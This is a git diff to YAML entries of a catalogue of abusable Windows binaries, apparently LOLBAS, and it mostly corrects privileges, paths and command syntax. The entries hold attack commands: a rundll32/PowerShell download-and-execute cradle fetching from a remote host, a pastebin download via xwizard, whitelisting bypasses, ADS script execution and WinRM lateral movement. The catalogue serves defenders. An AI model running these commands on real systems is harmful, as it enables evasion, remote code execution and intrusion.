diff --git a/yml/OSBinaries/Cscript.yml b/yml/OSBinaries/Cscript.yml index c3fe1b4..2b84d9e 100644 --- a/yml/OSBinaries/Cscript.yml +++ b/yml/OSBinaries/Cscript.yml @@ -4,7 +4,7 @@ Description: Binary used to execute scripts in Windows Author: 'Oddvar Moe' Created: 2018-05-25 Commands: - - Command: cscript c:\ads\file.txt:script.vbs + - Command: cscript //e:vbscript c:\ads\file.txt:script.vbs Description: Use cscript.exe to exectute a Visual Basic script stored in an Alternate Data Stream (ADS). Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism Category: ADS diff --git a/yml/OSBinaries/Hh.yml b/yml/OSBinaries/Hh.yml index 714425a..8cf43fd 100644 --- a/yml/OSBinaries/Hh.yml +++ b/yml/OSBinaries/Hh.yml @@ -19,8 +19,7 @@ Commands: MitreID: T1218.001 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - - Path: C:\Windows\System32\hh.exe - - Path: C:\Windows\SysWOW64\hh.exe + - Path: C:\Windows\hh.exe Code_Sample: - Code: Detection: diff --git a/yml/OSBinaries/Infdefaultinstall.yml b/yml/OSBinaries/Infdefaultinstall.yml index e28ba10..1ec76d5 100644 --- a/yml/OSBinaries/Infdefaultinstall.yml +++ b/yml/OSBinaries/Infdefaultinstall.yml @@ -8,7 +8,7 @@ Commands: Description: Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file. Usecase: Code execution Category: Execute - Privileges: User + Privileges: Admin MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: diff --git a/yml/OSBinaries/Netsh.yml b/yml/OSBinaries/Netsh.yml index 969d433..87e70b9 100644 --- a/yml/OSBinaries/Netsh.yml +++ b/yml/OSBinaries/Netsh.yml @@ -8,7 +8,7 @@ Commands: Description: Use Netsh in order to execute a .dll file and also gain persistence, every time the netsh command is called Usecase: Proxy execution of .dll Category: Execute - Privileges: User + Privileges: Admin MitreID: T1546.007 OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: diff --git a/yml/OSBinaries/Odbcconf.yml b/yml/OSBinaries/Odbcconf.yml index 07cd750..551c133 100644 --- a/yml/OSBinaries/Odbcconf.yml +++ b/yml/OSBinaries/Odbcconf.yml @@ -5,7 +5,7 @@ Author: 'Oddvar Moe' Created: 2018-05-25 Commands: - Command: odbcconf -f file.rsp - Description: Load DLL specified in target .RSP file. See the Playloads folder for an example .RSP file. + Description: Load DLL specified in target .RSP file. See the payloads folder for an example .RSP file. Usecase: Execute dll file using technique that can evade defensive counter measures Category: Execute Privileges: User diff --git a/yml/OSBinaries/Regedit.yml b/yml/OSBinaries/Regedit.yml index 3868fd5..b45a3c1 100644 --- a/yml/OSBinaries/Regedit.yml +++ b/yml/OSBinaries/Regedit.yml @@ -19,8 +19,7 @@ Commands: MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - - Path: C:\Windows\System32\regedit.exe - - Path: C:\Windows\SysWOW64\regedit.exe + - Path: C:\Windows\regedit.exe Code_Sample: - Code: Detection: diff --git a/yml/OSBinaries/Regsvcs.yml b/yml/OSBinaries/Regsvcs.yml index bc2aa44..0b0e529 100644 --- a/yml/OSBinaries/Regsvcs.yml +++ b/yml/OSBinaries/Regsvcs.yml @@ -8,19 +8,19 @@ Commands: Description: Loads the target .DLL file and executes the RegisterClass function. Usecase: Execute dll file and bypass Application whitelisting Category: Execute - Privileges: Local Admin + Privileges: User MitreID: T1218.009 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: regsvcs.exe AllTheThingsx64.dll Description: Loads the target .DLL file and executes the RegisterClass function. Usecase: Execute dll file and bypass Application whitelisting Category: AWL bypass - Privileges: Local Admin + Privileges: User MitreID: T1218.009 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - - Path: C:\Windows\System32\regsvcs.exe - - Path: C:\Windows\SysWOW64\regsvcs.exe + - Path: c:\Windows\Microsoft.NET\Framework\v*\regsvcs.exe + - Path: c:\Windows\Microsoft.NET\Framework64\v*\regsvcs.exe Code_Sample: - Code: Detection: diff --git a/yml/OSBinaries/Rundll32.yml b/yml/OSBinaries/Rundll32.yml index 568f322..59365e9 100644 --- a/yml/OSBinaries/Rundll32.yml +++ b/yml/OSBinaries/Rundll32.yml @@ -18,7 +18,7 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');" + - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');") Description: Use Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site. Usecase: Execute code from Internet Category: Execute diff --git a/yml/OSBinaries/Vbc.yml b/yml/OSBinaries/Vbc.yml index 47d177f..a8bee1a 100644 --- a/yml/OSBinaries/Vbc.yml +++ b/yml/OSBinaries/Vbc.yml @@ -5,19 +5,19 @@ Author: Lior Adar Created: 2020-02-27 Commands: - Command: vbc.exe /target:exe c:\temp\vbs\run.vb - Description: Binary file used by .NET to compile vb code to .exe + Description: Binary file used by .NET to compile Visual Basic code to an executable. Usecase: Compile attacker code on system. Bypass defensive counter measures. Category: Compile Privileges: User MitreID: T1127 - OperatingSystem: Windows 10,7 + OperatingSystem: Windows 7, Windows 10, Windows 11 - Command: vbc -reference:Microsoft.VisualBasic.dll c:\temp\vbs\run.vb - Description: Description of the second command - Usecase: A description of the usecase + Description: Binary file used by .NET to compile Visual Basic code to an executable. + Usecase: Compile attacker code on system. Bypass defensive counter measures. Category: Compile Privileges: User MitreID: T1127 - OperatingSystem: Windows 10,7 + OperatingSystem: Windows 7, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v3.5\vbc.exe diff --git a/yml/OSBinaries/Wscript.yml b/yml/OSBinaries/Wscript.yml index b1b8b54..d49557f 100644 --- a/yml/OSBinaries/Wscript.yml +++ b/yml/OSBinaries/Wscript.yml @@ -4,7 +4,7 @@ Description: Used by Windows to execute scripts Author: 'Oddvar Moe' Created: 2018-05-25 Commands: - - Command: wscript c:\ads\file.txt:script.vbs + - Command: wscript //e:vbscript c:\ads\file.txt:script.vbs Description: Execute script stored in an alternate data stream Usecase: Execute hidden code to evade defensive counter measures Category: ADS diff --git a/yml/OSBinaries/Xwizard.yml b/yml/OSBinaries/Xwizard.yml index 082ce3b..96e5dcc 100644 --- a/yml/OSBinaries/Xwizard.yml +++ b/yml/OSBinaries/Xwizard.yml @@ -19,7 +19,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/raw/iLxUT5gM - Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file. + Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file, and save it to %LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/[1]. or %LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/[1]. Usecase: Download file from Internet Category: Download Privileges: User diff --git a/yml/OSLibraries/Advpack.yml b/yml/OSLibraries/Advpack.yml index 8ee42f4..b015321 100644 --- a/yml/OSLibraries/Advpack.yml +++ b/yml/OSLibraries/Advpack.yml @@ -15,7 +15,7 @@ Commands: Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied). Usecase: Run local or remote script(let) code through INF file specification. Category: AWL Bypass - Privileges: User + Privileges: Admin MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 - Command: rundll32.exe advpack.dll,RegisterOCX test.dll diff --git a/yml/OSLibraries/Ieadvpack.yml b/yml/OSLibraries/Ieadvpack.yml index ca4dd14..631c1f1 100644 --- a/yml/OSLibraries/Ieadvpack.yml +++ b/yml/OSLibraries/Ieadvpack.yml @@ -10,35 +10,35 @@ Commands: Category: AWL Bypass Privileges: User MitreID: T1218.011 - OperatingSystem: Windows, Windows 11 (!!!) + OperatingSystem: Windows 10, Windows 11 - Command: rundll32.exe ieadvpack.dll,LaunchINFSection c:\test.inf,,1, Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied). Usecase: Run local or remote script(let) code through INF file specification. Category: AWL Bypass - Privileges: User + Privileges: Admin MitreID: T1218.011 - OperatingSystem: Windows, Windows 11 (!!!) + OperatingSystem: Windows 10, Windows 11 - Command: rundll32.exe ieadvpack.dll,RegisterOCX test.dll Description: Launch a DLL payload by calling the RegisterOCX function. Usecase: Load a DLL payload. Category: Execute Privileges: User MitreID: T1218.011 - OperatingSystem: Windows, Windows 11 (!!!) + OperatingSystem: Windows 10, Windows 11 - Command: rundll32.exe ieadvpack.dll,RegisterOCX calc.exe Description: Launch an executable by calling the RegisterOCX function. Usecase: Run an executable payload. Category: Execute Privileges: User MitreID: T1218.011 - OperatingSystem: Windows, Windows 11 (!!!) + OperatingSystem: Windows 10, Windows 11 - Command: rundll32 ieadvpack.dll, RegisterOCX "cmd.exe /c calc.exe" Description: Launch command line by calling the RegisterOCX function. Usecase: Run an executable payload. Category: Execute Privileges: User MitreID: T1218.011 - OperatingSystem: Windows, Windows 11 (!!!) + OperatingSystem: Windows 10, Windows 11 Full_Path: - Path: c:\windows\system32\ieadvpack.dll - Path: c:\windows\syswow64\ieadvpack.dll diff --git a/yml/OSLibraries/Shell32.yml b/yml/OSLibraries/Shell32.yml index bfd4dee..e94f6b2 100644 --- a/yml/OSLibraries/Shell32.yml +++ b/yml/OSLibraries/Shell32.yml @@ -4,7 +4,7 @@ Description: Windows Shell Common Dll Author: Created: 2018-05-25 Commands: - - Command: rundll32.exe shell32.dll,Control_RunDLL payload.dll + - Command: rundll32.exe shell32.dll,Control_RunDLL c:\path\to\payload.dll Description: Launch a DLL payload by calling the Control_RunDLL function. Usecase: Load a DLL payload. Category: Execute diff --git a/yml/OSScripts/CL_LoadAssembly.yml b/yml/OSScripts/CL_LoadAssembly.yml index 85da874..1fdea2a 100644 --- a/yml/OSScripts/CL_LoadAssembly.yml +++ b/yml/OSScripts/CL_LoadAssembly.yml @@ -4,7 +4,7 @@ Description: PowerShell Diagnostic Script Author: Jimmy (@bohops) Created: 2021-09-26 Commands: - - Command: 'powershell.exe -command "set-location -path C:\Windows\diagnostics\system\Audio; import-module .\CL_LoadAssembly.ps1; LoadAssemblyFromPath ..\..\..\..\testing\fun.dll;[Program]::Fun()' + - Command: 'powershell.exe -ep bypass -command "set-location -path C:\Windows\diagnostics\system\Audio; import-module .\CL_LoadAssembly.ps1; LoadAssemblyFromPath ..\..\..\..\testing\fun.dll;[Program]::Fun()"' Description: Proxy execute Managed DLL with PowerShell Usecase: Execute proxied payload with Microsoft signed binary Category: Execute diff --git a/yml/OSScripts/UtilityFunctions.yml b/yml/OSScripts/UtilityFunctions.yml index 587242c..d5e07b3 100644 --- a/yml/OSScripts/UtilityFunctions.yml +++ b/yml/OSScripts/UtilityFunctions.yml @@ -4,7 +4,7 @@ Description: PowerShell Diagnostic Script Author: Jimmy (@bohops) Created: 2021-09-26 Commands: - - Command: 'powershell.exe -command "set-location -path c:\windows\diagnostics\system\networking; import-module .\UtilityFunctions.ps1; RegSnapin ..\..\..\..\temp\unsigned.dll;[Program.Class]::Main()”' + - Command: 'powershell.exe -ep bypass -command "set-location -path c:\windows\diagnostics\system\networking; import-module .\UtilityFunctions.ps1; RegSnapin ..\..\..\..\temp\unsigned.dll;[Program.Class]::Main()"' Description: Proxy execute Managed DLL with PowerShell Usecase: Execute proxied payload with Microsoft signed binary Category: Execute diff --git a/yml/OSScripts/Winrm.yml b/yml/OSScripts/Winrm.yml index 023d4e7..c108ab3 100644 --- a/yml/OSScripts/Winrm.yml +++ b/yml/OSScripts/Winrm.yml @@ -11,11 +11,11 @@ Commands: Privileges: User MitreID: T1216 OperatingSystem: Windows 10, Windows 11 - - Command: 'winrm invoke Create wmicimv2/Win32_Service @{Name="Evil";DisplayName="Evil";PathName="cmd.exe /k c:\windows\system32\notepad.exe"} -r:http://acmedc:5985 \nwinrm invoke StartService wmicimv2/Win32_Service?Name=Evil -r:http://acmedc:5985' + - Command: 'winrm invoke Create wmicimv2/Win32_Service @{Name="Evil";DisplayName="Evil";PathName="cmd.exe /k c:\windows\system32\notepad.exe"} -r:http://acmedc:5985 && winrm invoke StartService wmicimv2/Win32_Service?Name=Evil -r:http://acmedc:5985' Description: Lateral movement/Remote Command Execution via WMI Win32_Service class over the WinRM protocol Usecase: Proxy execution Category: Execute - Privileges: User + Privileges: Admin MitreID: T1216 OperatingSystem: Windows 10, Windows 11 - Command: '%SystemDrive%\BypassDir\cscript //nologo %windir%\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:pretty'